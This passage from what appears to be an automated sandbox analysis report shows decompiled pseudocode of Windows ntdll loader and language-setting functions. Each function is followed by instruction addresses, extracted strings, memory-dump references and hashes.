					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04F2BB40(_t267,  &_v68, _t245);
							if(L04EF43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04F31370(_t284, 0x4ec4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04F2BB40(_t267,  &_v68, _t224);
						if(L04EF43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                                0x04ef3d3c
                                                                                                                                0x04ef3d42
                                                                                                                                0x04ef3d44
                                                                                                                                0x04ef3d46
                                                                                                                                0x04ef3d49
                                                                                                                                0x04ef3d4c
                                                                                                                                0x04ef3d4f
                                                                                                                                0x04ef3d52
                                                                                                                                0x04ef3d55
                                                                                                                                0x04ef3d58
                                                                                                                                0x04ef3d5b
                                                                                                                                0x04ef3d5f
                                                                                                                                0x04ef3d61
                                                                                                                                0x04ef3d66
                                                                                                                                0x04f48213
                                                                                                                                0x04f48218
                                                                                                                                0x04ef4085
                                                                                                                                0x04ef4088
                                                                                                                                0x04ef408e
                                                                                                                                0x04ef4094
                                                                                                                                0x04ef409a
                                                                                                                                0x04ef40a0
                                                                                                                                0x04ef40a6
                                                                                                                                0x04ef40a9
                                                                                                                                0x04ef40af
                                                                                                                                0x04ef40b6
                                                                                                                                0x04ef40bd
                                                                                                                                0x04ef40bd
                                                                                                                                0x04ef3d83
                                                                                                                                0x04f4821f
                                                                                                                                0x04f48229
                                                                                                                                0x04f48238
                                                                                                                                0x04f48238
                                                                                                                                0x04f4823d
                                                                                                                                0x04f4823d
                                                                                                                                0x04ef3da0
                                                                                                                                0x04ef3daf
                                                                                                                                0x04ef3db5
                                                                                                                                0x04ef3dba
                                                                                                                                0x04ef3dba
                                                                                                                                0x04ef3dd4
                                                                                                                                0x04ef3e94
                                                                                                                                0x04ef3eab
                                                                                                                                0x04ef3f6d
                                                                                                                                0x04ef3f84
                                                                                                                                0x04ef406b
                                                                                                                                0x04ef406b
                                                                                                                                0x04ef406e
                                                                                                                                0x04ef406e
                                                                                                                                0x04ef4070
                                                                                                                                0x04ef4074
                                                                                                                                0x04f48351
                                                                                                                                0x04f48351
                                                                                                                                0x04ef407a
                                                                                                                                0x04ef407f
                                                                                                                                0x04f4835d
                                                                                                                                0x04f48370
                                                                                                                                0x04f48377
                                                                                                                                0x04f48379
                                                                                                                                0x04f4837c
                                                                                                                                0x04f4837c
                                                                                                                                0x04f4835d
                                                                                                                                0x00000000
                                                                                                                                0x04ef407f
                                                                                                                                0x04ef3f8a
                                                                                                                                0x04ef3f8d
                                                                                                                                0x04ef3f90
                                                                                                                                0x04ef3f95
                                                                                                                                0x04f4830d
                                                                                                                                0x04f4830f
                                                                                                                                0x04ef3f9b
                                                                                                                                0x04ef3fac
                                                                                                                                0x04ef3fae
                                                                                                                                0x04ef3fb1
                                                                                                                                0x04ef3fb1
                                                                                                                                0x04ef3fb6
                                                                                                                                0x04f48317
                                                                                                                                0x04f4831a
                                                                                                                                0x00000000
                                                                                                                                0x04ef3fbc
                                                                                                                                0x04ef3fc1
                                                                                                                                0x04ef3fc9
                                                                                                                                0x04ef3fd7
                                                                                                                                0x04ef3fda
                                                                                                                                0x04ef3fdd
                                                                                                                                0x04ef4021
                                                                                                                                0x04ef4021
                                                                                                                                0x04ef4029
                                                                                                                                0x04ef4030
                                                                                                                                0x04ef4044
                                                                                                                                0x04ef4046
                                                                                                                                0x04ef4046
                                                                                                                                0x04ef4044
                                                                                                                                0x04ef4049
                                                                                                                                0x04f48327
                                                                                                                                0x04f48334
                                                                                                                                0x04f48339
                                                                                                                                0x04f4833c
                                                                                                                                0x04ef404f
                                                                                                                                0x04ef404f
                                                                                                                                0x04ef404f
                                                                                                                                0x04ef4051
                                                                                                                                0x04ef4056
                                                                                                                                0x04ef4063
                                                                                                                                0x04ef4063
                                                                                                                                0x04ef4068
                                                                                                                                0x00000000
                                                                                                                                0x04ef4068
                                                                                                                                0x04ef3fdf
                                                                                                                                0x04ef3fe2
                                                                                                                                0x04ef3fe4
                                                                                                                                0x04ef3fe7
                                                                                                                                0x04ef3fef
                                                                                                                                0x04ef4003
                                                                                                                                0x04ef4005
                                                                                                                                0x04ef4005
                                                                                                                                0x04ef400c
                                                                                                                                0x04ef4013
                                                                                                                                0x04ef4016
                                                                                                                                0x04ef4017
                                                                                                                                0x04ef401b
                                                                                                                                0x04ef401e
                                                                                                                                0x00000000
                                                                                                                                0x04ef401e
                                                                                                                                0x04ef3fb6
                                                                                                                                0x04ef3eb1
                                                                                                                                0x04ef3eb4
                                                                                                                                0x04ef3eb7
                                                                                                                                0x04ef3ebc
                                                                                                                                0x04f482a9
                                                                                                                                0x04f482ab
                                                                                                                                0x04ef3ec2
                                                                                                                                0x04ef3ed3
                                                                                                                                0x04ef3ed5
                                                                                                                                0x04ef3ed8
                                                                                                                                0x04ef3ed8
                                                                                                                                0x04ef3edd
                                                                                                                                0x04f482b3
                                                                                                                                0x04f482b6
                                                                                                                                0x00000000
                                                                                                                                0x04ef3ee3
                                                                                                                                0x04ef3ee8
                                                                                                                                0x04ef3eed
                                                                                                                                0x04ef3ef0
                                                                                                                                0x04ef3ef3
                                                                                                                                0x04ef3f02
                                                                                                                                0x04ef3f05
                                                                                                                                0x04ef3f08
                                                                                                                                0x04f482c0
                                                                                                                                0x04f482c3
                                                                                                                                0x04f482c5
                                                                                                                                0x04f482c8
                                                                                                                                0x04f482d0
                                                                                                                                0x04f482e4
                                                                                                                                0x04f482e6
                                                                                                                                0x04f482e6
                                                                                                                                0x04f482ed
                                                                                                                                0x04f482f4
                                                                                                                                0x04f482f7
                                                                                                                                0x04f482f8
                                                                                                                                0x04f482fc
                                                                                                                                0x04f482ff
                                                                                                                                0x04f482ff
                                                                                                                                0x04ef3f0e
                                                                                                                                0x04ef3f11
                                                                                                                                0x04ef3f16
                                                                                                                                0x04ef3f1d
                                                                                                                                0x04ef3f31
                                                                                                                                0x04f48307
                                                                                                                                0x04f48307
                                                                                                                                0x04ef3f31
                                                                                                                                0x04ef3f39
                                                                                                                                0x04ef3f48
                                                                                                                                0x04ef3f4d
                                                                                                                                0x04ef3f50
                                                                                                                                0x04ef3f50
                                                                                                                                0x04ef3f53
                                                                                                                                0x04ef3f58
                                                                                                                                0x04ef3f65
                                                                                                                                0x04ef3f65
                                                                                                                                0x04ef3f6a
                                                                                                                                0x00000000
                                                                                                                                0x04ef3f6a
                                                                                                                                0x04ef3edd
                                                                                                                                0x04ef3dda
                                                                                                                                0x04ef3ddd
                                                                                                                                0x04ef3de0
                                                                                                                                0x04ef3de5
                                                                                                                                0x04f48245
                                                                                                                                0x04ef3deb
                                                                                                                                0x04ef3df7
                                                                                                                                0x04ef3dfc
                                                                                                                                0x04ef3dfe
                                                                                                                                0x04ef3e01
                                                                                                                                0x04ef3e01
                                                                                                                                0x04ef3e06
                                                                                                                                0x04f4824d
                                                                                                                                0x04f4824f
                                                                                                                                0x04f48254
                                                                                                                                0x00000000
                                                                                                                                0x04ef3e0c
                                                                                                                                0x04ef3e11
                                                                                                                                0x04ef3e16
                                                                                                                                0x04ef3e19
                                                                                                                                0x04ef3e29
                                                                                                                                0x04ef3e2c
                                                                                                                                0x04ef3e2f
                                                                                                                                0x04f4825c
                                                                                                                                0x04f4825f
                                                                                                                                0x04f48261
                                                                                                                                0x04f48264
                                                                                                                                0x04f4826c
                                                                                                                                0x04f48280
                                                                                                                                0x04f48282
                                                                                                                                0x04f48282
                                                                                                                                0x04f48289
                                                                                                                                0x04f48290
                                                                                                                                0x04f48293
                                                                                                                                0x04f48294
                                                                                                                                0x04f48298
                                                                                                                                0x04f4829b
                                                                                                                                0x04f4829b
                                                                                                                                0x04ef3e35
                                                                                                                                0x04ef3e38
                                                                                                                                0x04ef3e3d
                                                                                                                                0x04ef3e44
                                                                                                                                0x04ef3e58
                                                                                                                                0x04f482a3
                                                                                                                                0x04f482a3
                                                                                                                                0x04ef3e58
                                                                                                                                0x04ef3e60
                                                                                                                                0x04ef3e6f
                                                                                                                                0x04ef3e74
                                                                                                                                0x04ef3e77
                                                                                                                                0x04ef3e77
                                                                                                                                0x04ef3e7a
                                                                                                                                0x04ef3e7f
                                                                                                                                0x04ef3e8c
                                                                                                                                0x04ef3e8c
                                                                                                                                0x04ef3e91
                                                                                                                                0x00000000
                                                                                                                                0x04ef3e91

                                                                                                                                Strings
                                                                                                                                • WindowsExcludedProcs, xrefs: 04EF3D6F
                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 04EF3F70
                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 04EF3E97
                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 04EF3D8C
                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 04EF3DC0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                • API String ID: 0-258546922
                                                                                                                                • Opcode ID: 2962666e54a1645e0ba290e71c1c2e0198fad698ebfc7f870d2aff0e583374c7
                                                                                                                                • Instruction ID: 1725c61071f5f1f27bea8898a13a291d67bb32980d549457c66a8d81a6c4aff3
                                                                                                                                • Opcode Fuzzy Hash: 2962666e54a1645e0ba290e71c1c2e0198fad698ebfc7f870d2aff0e583374c7
                                                                                                                                • Instruction Fuzzy Hash: 04F14D76D00218EFDB11DF98CD409EEBBB9FF48754F14506AE905A7250E730AE02DB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F18E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 44%
                                                                                                                                			E04F18E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4fdd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4fd8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4fd5780 & 0x00000003) != 0) {
							E04F65510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4fd5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04F2B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4fd7984; // 0x3001df0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4fd8464; // 0x73b80110
					 *0x4fdb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04F19B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4fd5780 & 0x00000005) != 0) {
						_push(_t49);
						E04F65510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                                0x04f18e0f
                                                                                                                                0x04f18e16
                                                                                                                                0x04f18e19
                                                                                                                                0x04f18e1b
                                                                                                                                0x04f18e21
                                                                                                                                0x04f18e7f
                                                                                                                                0x04f18e85
                                                                                                                                0x04f59354
                                                                                                                                0x04f5936c
                                                                                                                                0x04f59371
                                                                                                                                0x04f5937b
                                                                                                                                0x04f59381
                                                                                                                                0x04f59381
                                                                                                                                0x04f5937b
                                                                                                                                0x04f18e9d
                                                                                                                                0x04f18e9d
                                                                                                                                0x04f18e29
                                                                                                                                0x04f18e2c
                                                                                                                                0x04f18e38
                                                                                                                                0x04f18e3e
                                                                                                                                0x04f18e43
                                                                                                                                0x04f18eb5
                                                                                                                                0x04f18eb9
                                                                                                                                0x04f592aa
                                                                                                                                0x04f592af
                                                                                                                                0x04f592e8
                                                                                                                                0x04f592e8
                                                                                                                                0x04f592af
                                                                                                                                0x04f18eb9
                                                                                                                                0x04f18e45
                                                                                                                                0x04f18e53
                                                                                                                                0x04f18e5b
                                                                                                                                0x04f18e5f
                                                                                                                                0x04f18e78
                                                                                                                                0x04f18e78
                                                                                                                                0x04f18e7d
                                                                                                                                0x04f18ec3
                                                                                                                                0x04f18ecd
                                                                                                                                0x04f18ed2
                                                                                                                                0x04f18ed2
                                                                                                                                0x04f18ec5
                                                                                                                                0x04f18ec5
                                                                                                                                0x00000000
                                                                                                                                0x04f18e7d
                                                                                                                                0x04f18e67
                                                                                                                                0x04f18ea4
                                                                                                                                0x04f5931a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f59320
                                                                                                                                0x04f18ea4
                                                                                                                                0x04f18e70
                                                                                                                                0x04f59325
                                                                                                                                0x04f59340
                                                                                                                                0x04f59345
                                                                                                                                0x04f59345
                                                                                                                                0x04f18e76
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                Strings
                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 04F5933B, 04F59367
                                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04F5932A
                                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 04F59357
                                                                                                                                • LdrpFindDllActivationContext, xrefs: 04F59331, 04F5935D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                • API String ID: 0-3779518884
                                                                                                                                • Opcode ID: 99a9db3a2be8cacc00ab43a1929aced27677d0b3bb8bccbef80b7824304e76ac
                                                                                                                                • Instruction ID: 3cc8d34e8bab59a5cfdfb0c39e71fcbeaed7ff397e9f0fd717d60cd28dc1c7d0
                                                                                                                                • Opcode Fuzzy Hash: 99a9db3a2be8cacc00ab43a1929aced27677d0b3bb8bccbef80b7824304e76ac
                                                                                                                                • Instruction Fuzzy Hash: 5F41E432E00315AFDB34BF98DAC9A76B6A5EB05388F054169E80497570E7A47D8287C1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 83%
                                                                                                                                			E04EF8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04EF934A() != 0) {
								_t159 = E04F6A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4fd5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04F65510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4fd5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04EF849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04EF8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04EF8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4fd5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4fd5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04F02280(_t92, 0x4fd86cc);
															_t94 = E04FB9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04F161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4fd5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04EF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4fd5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4fd5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04F2F380(_t136, 0x4ec1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04F02280(_t108, 0x4fd86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04F161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04FB9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04EFFFB0(_t118, _t156, 0x4fd86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04F29A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                                0x04ef8799
                                                                                                                                0x04ef879d
                                                                                                                                0x04ef87a1
                                                                                                                                0x04ef87a3
                                                                                                                                0x04ef87a8
                                                                                                                                0x04ef87c3
                                                                                                                                0x04ef87c3
                                                                                                                                0x04ef87c8
                                                                                                                                0x04ef87d1
                                                                                                                                0x04ef87d4
                                                                                                                                0x04ef87d8
                                                                                                                                0x04ef87e5
                                                                                                                                0x04ef87ec
                                                                                                                                0x04f49bfe
                                                                                                                                0x04f49c00
                                                                                                                                0x04f49c02
                                                                                                                                0x04f49c08
                                                                                                                                0x04f49c0d
                                                                                                                                0x04f49c0f
                                                                                                                                0x04f49c14
                                                                                                                                0x04f49c2d
                                                                                                                                0x04f49c32
                                                                                                                                0x04f49c37
                                                                                                                                0x04f49c3a
                                                                                                                                0x04f49c3c
                                                                                                                                0x04f49c42
                                                                                                                                0x04f49c42
                                                                                                                                0x04f49c3c
                                                                                                                                0x04f49c02
                                                                                                                                0x04ef87da
                                                                                                                                0x04ef87df
                                                                                                                                0x04ef87e3
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef87e3
                                                                                                                                0x04ef87f2
                                                                                                                                0x00000000
                                                                                                                                0x04ef87fb
                                                                                                                                0x04ef87fd
                                                                                                                                0x04ef87fe
                                                                                                                                0x04ef880e
                                                                                                                                0x04ef880f
                                                                                                                                0x04ef8810
                                                                                                                                0x04ef8814
                                                                                                                                0x04ef881a
                                                                                                                                0x04ef881c
                                                                                                                                0x04ef881f
                                                                                                                                0x04ef8821
                                                                                                                                0x04ef8822
                                                                                                                                0x04ef8824
                                                                                                                                0x04ef8826
                                                                                                                                0x04ef882c
                                                                                                                                0x04ef882e
                                                                                                                                0x04f49c48
                                                                                                                                0x04f49c48
                                                                                                                                0x04ef8834
                                                                                                                                0x04ef8834
                                                                                                                                0x04ef8837
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef8837
                                                                                                                                0x04ef882e
                                                                                                                                0x04ef883d
                                                                                                                                0x04ef8840
                                                                                                                                0x04ef8843
                                                                                                                                0x04ef8846
                                                                                                                                0x04ef8849
                                                                                                                                0x04ef884c
                                                                                                                                0x04ef884e
                                                                                                                                0x04ef8850
                                                                                                                                0x04ef8852
                                                                                                                                0x04ef8854
                                                                                                                                0x04ef8857
                                                                                                                                0x04ef88b4
                                                                                                                                0x04ef88b6
                                                                                                                                0x04ef88b6
                                                                                                                                0x04ef8859
                                                                                                                                0x04ef8859
                                                                                                                                0x04ef8859
                                                                                                                                0x04ef8861
                                                                                                                                0x04ef8866
                                                                                                                                0x04ef886a
                                                                                                                                0x04ef893d
                                                                                                                                0x04ef8941
                                                                                                                                0x00000000
                                                                                                                                0x04ef8947
                                                                                                                                0x04ef8947
                                                                                                                                0x04ef894a
                                                                                                                                0x04ef894c
                                                                                                                                0x00000000
                                                                                                                                0x04ef8952
                                                                                                                                0x04ef8955
                                                                                                                                0x04ef895a
                                                                                                                                0x04ef895d
                                                                                                                                0x04ef895d
                                                                                                                                0x04ef895f
                                                                                                                                0x04ef8961
                                                                                                                                0x04ef8961
                                                                                                                                0x04ef8968
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef896a
                                                                                                                                0x04ef896b
                                                                                                                                0x04ef896e
                                                                                                                                0x00000000
                                                                                                                                0x04ef8970
                                                                                                                                0x04ef8970
                                                                                                                                0x04ef8970
                                                                                                                                0x04ef8970
                                                                                                                                0x04ef8972
                                                                                                                                0x04ef8972
                                                                                                                                0x04ef8974
                                                                                                                                0x00000000
                                                                                                                                0x04ef897a
                                                                                                                                0x04ef897a
                                                                                                                                0x04ef897d
                                                                                                                                0x00000000
                                                                                                                                0x04ef8983
                                                                                                                                0x04f49c65
                                                                                                                                0x04f49c6d
                                                                                                                                0x04f49c72
                                                                                                                                0x04f49c75
                                                                                                                                0x04f49c75
                                                                                                                                0x04f49c82
                                                                                                                                0x04f49c86
                                                                                                                                0x04f49c87
                                                                                                                                0x04f49c88
                                                                                                                                0x04f49c89
                                                                                                                                0x04f49c8c
                                                                                                                                0x04f49c90
                                                                                                                                0x04f49c95
                                                                                                                                0x04f49c97
                                                                                                                                0x04f49ca0
                                                                                                                                0x04f49ca3
                                                                                                                                0x04f49ca9
                                                                                                                                0x04f49ca9
                                                                                                                                0x00000000
                                                                                                                                0x04f49ca9
                                                                                                                                0x04f49ca3
                                                                                                                                0x00000000
                                                                                                                                0x04f49c97
                                                                                                                                0x04ef897d
                                                                                                                                0x00000000
                                                                                                                                0x04ef8974
                                                                                                                                0x04ef8988
                                                                                                                                0x04ef8992
                                                                                                                                0x04ef8996
                                                                                                                                0x00000000
                                                                                                                                0x04ef8996
                                                                                                                                0x04ef894c
                                                                                                                                0x00000000
                                                                                                                                0x04ef8870
                                                                                                                                0x04ef887b
                                                                                                                                0x04ef887d
